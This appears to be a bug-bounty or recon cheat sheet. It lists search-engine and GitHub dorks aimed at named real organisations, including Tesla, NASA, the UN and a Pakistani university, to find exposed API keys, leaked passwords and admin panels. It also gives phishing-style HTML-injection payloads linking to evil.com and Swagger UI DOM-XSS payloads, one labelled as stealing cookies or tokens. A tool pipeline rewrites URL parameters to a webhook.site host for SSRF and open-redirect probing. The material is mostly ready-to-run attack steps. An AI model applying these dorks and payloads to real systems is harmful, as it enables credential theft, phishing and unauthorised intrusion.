Dorking
Find API Documentation
site:.tesla.com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
site:.tesla.com intext:"api_key=" OR intext:"apiKey" OR intext:"client_secret" OR intext:"Authorization: Bearer"
Found Admin Panels & Leaked credentials Using GitHub Dork
"nasa" "password":
"@nasa" "password":
"nasa" "auth"
"nasa" "Bearer"
Email HTML Injection On Contact Forms
site:.domain.com inurl:"contact.php" | inurl:"contactus" | inurl:"contactus.php" | inurl:"contactus.aspx" | inurl:"contactus.asp" | inurl:"contactus.html" | inurl:"contact-us.html" | inurl:"contact_us.html" | inurl:"contact.html" | inurl:"contactus.html"
site:.*.com inurl:"contact us" intext:"Full Name" intext:"First Name" intext:Email intext:"Email Address"
'"/><img src=x><a href=https://evil.com>Click
<b>hello</b><h1>hacker</h1><a href=https://evil.com>hacked
<h1> Dear User, Your account will be Suspended. Click Below to Verify </h1>
'"><<a href="http://evil.com">Click Me</a>
Email HTML Injection On Sign up Forms
site:.ue.edu.pk inurl:register | inurl:login | intitle:register | inurl:signup | intitle:signup | intext:signin | intext:login | intext:signup
<h1>Congratulations you won the cash prize </h1><img src="https://play-lh.googleusercontent.com/ufXzlOQA6bwOibqQ_yBmIFaqBWOl3bbgeffwPV8z3419PWPvHZfx4Vxe98GgQ8Z7mVQ"><a href="https://evil.com"><H1><U><I>Click here to claim your reward
hunter2-ywh-f6a5371da6033e99@yeswehack.ninja
swag@bugcrowdninja.com
Python@123
Find XSS via uploadfile Name
site:.harmanaudio.com inurl:"uploadform" | intext:"choose file"
site:.harmanaudio.com inurl:"contact us" | intext:"Full Name" | intext:"First Name" | intext:Email intext:"Email Address"
Find Swagger DOM XSS
site:.worldremit.com intext:"Swagger UI" | intitle:"Swagger UI"
site:.nasa.gov inurl:"/swagger-ui/index.html"
intitle:"Swagger UI" (inurl:"/swagger-ui/" OR inurl:"/swagger/" OR inurl:"/api-docs/" OR inurl:"/v2/api-docs" OR inurl:"/v3/api-docs" OR inurl:"swagger.json" OR inurl:"swagger.yaml") -github -gitlab -stackoverflow site:.un.org
nuclei -l livesubdomains.txt -t /home/kali/nucli/swagger/dom-xss/ -c 30
?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
# 1. Loads a custom Swagger login form template for login phishing
?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/rlogin.json
# 2. Tests open redirect behavior via a redirecting login config
?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/ylogin.json
# 3. Triggers a basic XSS payload to check for DOM-based vulnerabilities
?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.json
# 4. Executes a script to exfiltrate cookies or auth tokens from localStorage
?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.json
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
Check Open Redirect
site:*.pk inurl:"redirectURL="
site:*.pk inurl:"=https"
echo https://partnerprogramm.otto.de | gau --threads 100 | tee urls.txt
cat urls.txt | grep "=" | qsreplace https://webhook.site/fa023611-2e9b-463e-8099-1cd7ad7df965 > ssrf.txt
cat ssrf.txt | httpx -fr
split -l 10 ssrf.txt output_file_prefix
cat livesubdomains.txt | nuclei -t /home/kali/nucli/swagger/open-redirect-generic.yaml
Find and Exploit Admin Panel
site:.*.edu.pk "admin" inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure
site:.ue.edu.pk inurl:admin | inurl:dashboard | inurl:register | inurl:login | intitle:register | inurl:signup | intitle:signup | intext:signin | intext:login | intext:signup